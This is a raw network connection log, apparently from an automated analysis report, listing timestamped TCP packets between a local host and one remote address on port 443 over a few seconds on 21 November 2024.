                                                                                                                                                                      Nov 21, 2024 06:23:58.759047985 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.759061098 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.759077072 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.759084940 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.759123087 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.759141922 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.759141922 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.759186983 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.953927994 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.953946114 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.954010010 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.954040051 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.954056025 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.954148054 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.957034111 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.957056999 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.957119942 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.957151890 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:58.957638979 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:58.964415073 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.009447098 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.009463072 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.009552002 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.009566069 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.032474995 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.032499075 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.032578945 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.032592058 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.032633066 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.046638012 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.046691895 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.046717882 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.046735048 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.046761990 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.046794891 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.047220945 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.047236919 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.142226934 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.142251968 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.142297983 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.142323971 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.142338037 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.142370939 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.173253059 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.173278093 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.173311949 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.173326969 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.173341036 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.173363924 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.191020012 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.191050053 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.191098928 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.191113949 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.191134930 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.191153049 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.211725950 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.211750984 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.211831093 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.211847067 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.211990118 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.285007954 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.285073042 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.285151005 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.285501003 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.285512924 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.349795103 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.349823952 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.349899054 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.349945068 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.350001097 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.365717888 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.365740061 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.365814924 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.365827084 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.365868092 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.379547119 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.379570007 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.379615068 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.379630089 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.379656076 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.379667044 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.395481110 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.395499945 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.395558119 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.395572901 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.395618916 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.411495924 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.411514997 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.411572933 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.411583900 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.411890984 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.413804054 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.413870096 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.413927078 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.413970947 CET49831443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.413989067 CET4434983113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.815913916 CET4434983213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.816395998 CET49832443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.816425085 CET4434983213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:59.816848040 CET49832443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:59.816854000 CET4434983213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.098258018 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.098737001 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.098779917 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.099410057 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.099416018 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.172250986 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.172760963 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.172799110 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.173218966 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.173227072 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.230237007 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.230742931 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.230770111 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.231199980 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.231204987 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.259332895 CET4434983213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.262693882 CET4434983213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.262768984 CET49832443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.262854099 CET49832443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.262885094 CET4434983213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.262919903 CET49832443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.262934923 CET4434983213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.265913010 CET49841443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.265940905 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.266014099 CET49841443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.266194105 CET49841443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.266211033 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.320067883 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.321173906 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.321208954 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.321702957 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.321710110 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.555927038 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.556020975 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.556080103 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.556248903 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.556274891 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.556288004 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.556293964 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.560306072 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.560339928 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.560410023 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.560775042 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.560790062 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.632087946 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.635148048 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.635236979 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.635771990 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.635790110 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.635802031 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.635808945 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.639408112 CET49843443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.639431953 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.639678955 CET49843443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.640356064 CET49843443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.640374899 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.664819002 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.667731047 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.667840958 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.670687914 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.670718908 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.670734882 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.670741081 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.675375938 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.675427914 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.675518990 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.675712109 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.675731897 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.759661913 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.762797117 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.762881041 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.762963057 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.762963057 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.763003111 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.763035059 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.765367985 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.765419006 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:00.765538931 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.765753031 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:00.765782118 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.064995050 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.077222109 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.077322960 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.078448057 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.078551054 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.086539030 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.086648941 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.086682081 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.127338886 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.132057905 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.132093906 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.181469917 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.561973095 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.562001944 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.562011003 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.562030077 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.562037945 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.562046051 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.562081099 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.562141895 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.562175035 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.562201023 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.753599882 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.753613949 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.753643036 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.753684998 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.753726006 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.753756046 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.753814936 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.753918886 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.802725077 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.805805922 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.805819988 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.805840969 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.805851936 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.805897951 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.805907965 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.805957079 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.836746931 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.836818933 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.836836100 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.836877108 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.836920977 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:01.837006092 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.843244076 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:01.843265057 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.106879950 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.130928993 CET49841443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.131011963 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.131516933 CET49841443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.131524086 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.342452049 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.342924118 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.342968941 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.343385935 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.343391895 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.395190954 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.395721912 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.395762920 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.396285057 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.396295071 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.479736090 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.480180979 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.480261087 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.480746984 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.480762959 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.484358072 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.484762907 CET49843443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.484811068 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.485389948 CET49843443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.485403061 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.594928980 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.597868919 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.597960949 CET49841443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.598035097 CET49841443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.598048925 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.598062038 CET49841443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.598067999 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.602747917 CET49855443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.602792978 CET4434985513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.602982044 CET49855443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.603138924 CET49855443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.603154898 CET4434985513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.785948992 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.789005041 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.789088964 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.789110899 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.789133072 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.789184093 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.792448997 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.792464972 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.792479038 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.792484999 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.795444965 CET49856443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.795491934 CET4434985613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.795877934 CET49856443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.796052933 CET49856443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.796071053 CET4434985613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.828001022 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.831130028 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.831191063 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.831207037 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.831222057 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.831279039 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.831343889 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.831361055 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.831386089 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.831392050 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.834609985 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.834652901 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.834732056 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.834922075 CET49857443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:02.834933996 CET4434985713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.915249109 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:02.918401003 CET4434984513.107.246.45192.168.2.6
